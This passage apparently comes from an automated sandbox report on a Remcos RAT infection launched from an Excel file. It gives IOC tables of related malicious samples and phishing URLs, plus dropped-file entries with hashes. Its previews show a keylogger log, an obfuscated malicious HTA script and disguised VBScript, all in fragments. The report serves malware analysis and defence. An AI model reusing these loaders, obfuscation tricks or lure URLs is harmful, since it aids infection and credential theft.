                                                                                                                                                                              awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • geoplugin.net/json.gp

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              raw.githubusercontent.comSecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.111.133
                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.4146.6049.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.109.133
                                                                                                                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.109.133
                                                                                                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.109.133
                                                                                                                                                                              20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 185.199.110.133
                                                                                                                                                                              Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              Purchase Order No. 4500017624.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 185.199.110.133
                                                                                                                                                                              idabo.duckdns.orgQPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 135.148.195.248
                                                                                                                                                                              DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 135.148.195.248
                                                                                                                                                                              PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 135.148.195.248
                                                                                                                                                                              geoplugin.netWC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50

                                                                                                                                                                              ASNs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              AVAYAUSna.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.150.73.84
                                                                                                                                                                              0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                              • 135.64.195.28
                                                                                                                                                                              vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 198.157.41.196
                                                                                                                                                                              2NkFwDDoDy.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.80.118.106
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.98.84.251
                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 135.150.97.43
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.83.183.50
                                                                                                                                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 135.148.195.248
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.122.218.20
                                                                                                                                                                              na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 135.169.255.101
                                                                                                                                                                              ATOM86-ASATOM86NLSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              FASTLYUShttps://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.130.137
                                                                                                                                                                              https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                                                              • 199.232.196.209
                                                                                                                                                                              https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.0.114
                                                                                                                                                                              https://www.kwconnect.com/redirect?url=https://www.lugiest.com/sqx/#Xem9lLmdyYWhhbUBjeWJnLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.65.108
                                                                                                                                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.0.223
                                                                                                                                                                              3Af7PybsUi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 151.101.128.223
                                                                                                                                                                              Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.194.137
                                                                                                                                                                              https://payrollruntimesheet.weebly.com/verify.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 151.101.65.46

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              05af1f5ca1b87cc9cc9b25185115607dPO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              RFQ.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              klYCjbl66s.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              1njpP9QcUg.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 185.199.108.133
                                                                                                                                                                              7dcce5b76c8b17472d024758970a406btest.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              QKnj2Wb3yo.xlsxGet hashmaliciousHidden Macro 4.0Browse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              KjFT0qPTo4.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              Quotation_398893.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              Documentosrs.ppamGet hashmaliciousRevengeRATBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.136.81.248
                                                                                                                                                                              Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 150.136.81.248

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\ProgramData\remcos\logs.dat

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                              Entropy (8bit):3.5518266725926084
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:6ly0Poql55YcIeeDAlTywHWYmlUbySNosb3fxNa/WAv:6lTgUecpvHpbyQ350/W+
                                                                                                                                                                              MD5:98EF2947DE34ADF19BD6B0C22613B164
                                                                                                                                                                              SHA1:0004836E93975298299E0F1CD10996608BD224BB
                                                                                                                                                                              SHA-256:C5B30F91129F651AAE7588178872F471D8FBEB6FF8138B191D49E213C2A6515A
                                                                                                                                                                              SHA-512:6AB68965F23FB4A3CF1C0977042FA1F5AB936CFBB62C7BC707D39D2274390694B994A8070777BFA88543858AD5D5434BB6BC773161A2D890BCFD677A5A8AF84D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                              Preview:....[.2.0.2.4./.1.0./.1.4. .0.5.:.0.6.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .0.3.7.0.0.2.4.5.1.0.8.2._.1.0.1.4.2.0.2.4. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4742
                                                                                                                                                                              Entropy (8bit):4.8105940880640246
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:@...e...........................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):167898
                                                                                                                                                                              Entropy (8bit):2.3094679199096855
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:7oa+awjz7eWLB23EfAq6kfAKV6/HQ2UBW1++izpyHBfHLPy3JofufAYfAkhjQ/od:Ea+n7QbzVsdi9yOPtksVKLSAT
                                                                                                                                                                              MD5:52BB72DAA6C16C09D4298BD59E12B7D9
                                                                                                                                                                              SHA1:2E4AEF7DF584ACAADB5A6E555D6E2F40AE12B6F1
                                                                                                                                                                              SHA-256:8FBF6165B0751A47BF9842011E82C4A7715CC879FD7272B45AB549DF6E813E46
                                                                                                                                                                              SHA-512:1A6A1C54CEED1D004E32504BB473D2525DCFF1974D8618AF871252E4DA7F3992CA87ACC935A74F78CD6C14F172142CCFEEE9BCB47104EA50A704FE37750D4EE4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScriPt%25252520LaNGUaGe%2525253D%25252522VbsCripT%25252522%2525253E%2525250Adim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestpricewithgoodcookiesme[1].tiff

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):195824
                                                                                                                                                                              Entropy (8bit):3.733217557919086
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:asQ4xYsrlTzTSTB3SJrS5GhHLgt5pxGwUAu6zUhYpt0nb2PRJ7oWdHIx:GUYsrlTyN3IS52lwt0nM5U
                                                                                                                                                                              MD5:5A71149A9C997CDCB94F1A84860417F7
                                                                                                                                                                              SHA1:9D80F853425AE99D844A70CEBAA59AEE73C537D1
                                                                                                                                                                              SHA-256:FF6B47D315645FDDC632876AE60A1A33A3E9138CEEF8A073D2FE8779208F7D8C
                                                                                                                                                                              SHA-512:448D914AA714C3DEAB84218BEDA6A3E94A9A5B8A5D912178F72A2EA82C73AD6DDB86A8E3443785FDCE8D9FD876C5DF7C26CD878DFA33F432E38AD62FF0E91C1B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .a.l.m.e.c.e.g.u.e.i.r.a.(.f.l.u.c.t.u.a.d.o.r.,. .d.e.s.v.a.r.i.a.r.,. .m.i.l.i.c.i.a.n.o.,. .m.o.a.n.s.a.,. .h.e.m.i.a.t.r.o.p.h.i.a.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .m.i.l.i.c.i.a.n.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                              Entropy (8bit):5.013130376969173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                              MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                                                                                                                              SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                                                                                                                              SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                                                                                                                              SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B555AA9.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):146860
                                                                                                                                                                              Entropy (8bit):2.79614169198914
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:YssZm/SacgbNk86RW7wRyFJgUiwJ6rvI9JxZKlrJfK1QVuIX0YTRJWgVTaD6mmpF:Z6vmurYEozhngbQXgtFOEXvjDZcyJuzq
                                                                                                                                                                              MD5:B2537BB2532A506CB494FEEEBA42B817
                                                                                                                                                                              SHA1:F50BC54DF6AC684470E239C968543042D6E65D10
                                                                                                                                                                              SHA-256:B96B28AFC4441E55ED0A3FCD9E8F9F6097607CD8CC8E60DB4CCF93F267C6E4D1
                                                                                                                                                                              SHA-512:7BB23BDE059F56E8B9098E29677E29DFB222552099DDA4FAE30EC2BFF7E33F0E5552A677538D25448DA43E3699E4004EB71201B4C6F1EBFD669A9CE891819CF8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l...............`............B...... EMF.....=..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a...'......................%..........................................................L...d...............:...............;...!..............?...........?................................'.......................%...........(.......................L...d.......:.......t.......:.......

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D50DAA.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):765340
                                                                                                                                                                              Entropy (8bit):4.149249166872395
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:WLVlSKmzCJEuu6vmurYEozhngbQXgtFOEXvjDZcyJuzUcRWWZEPX4V9GsYzVyYlB:WX9R
                                                                                                                                                                              MD5:D439450CD3385B127E476E71929E8B32
                                                                                                                                                                              SHA1:ED5F78F281E5279D420E37EE7F68DA88EEAB4E77
                                                                                                                                                                              SHA-256:17458474EA7FE82E2D5BA484D82B8FE65A61692E10CF264F543394AE471EF2F9
                                                                                                                                                                              SHA-512:0DE2C6B9E56E749A435CC7E831BE161922B64BDBA14A0B7EA0F9140BD466061DCD60571D5125F6438AB67FEFCE7159B29AEB37163545A99C4F72F4408BAF499D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l...............o...........@m..?... EMF........x+..)...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DDD6DA3.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):34096
                                                                                                                                                                              Entropy (8bit):2.5740918692485883
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:IpYteMCH1DvDYFuSSk07lzsB1NocFfABZxZvM:tSkUBzs/acFMvM
                                                                                                                                                                              MD5:095D80B603C4CE2DEAA2CBBA2118EA3D
                                                                                                                                                                              SHA1:0C29528AD023A9DEA876E2506125E048CA4B070E
                                                                                                                                                                              SHA-256:2B8B0F6D17E320FE30D2A846AE140F6F5BAEF98C8B86F8BB606BFF8BD68E557B
                                                                                                                                                                              SHA-512:78D36E98386B300EFDCE1D91223EDC5D8332EE8522333FC8AD767B479993CD683014F7B76AE98B2A881B0FDD8D6A3AB05789186B720F6C2029A7BB7AE38C218F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....l...........0................]...?.. EMF....0...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................L...d...............A...............*...!..............?...........?................................'.......................%...........(.......................L...d...........)...A...........V...

                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BB2114.emf

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):765340
                                                                                                                                                                              Entropy (8bit):4.149249166872395
                                                                                                                                                                              Encrypted:false
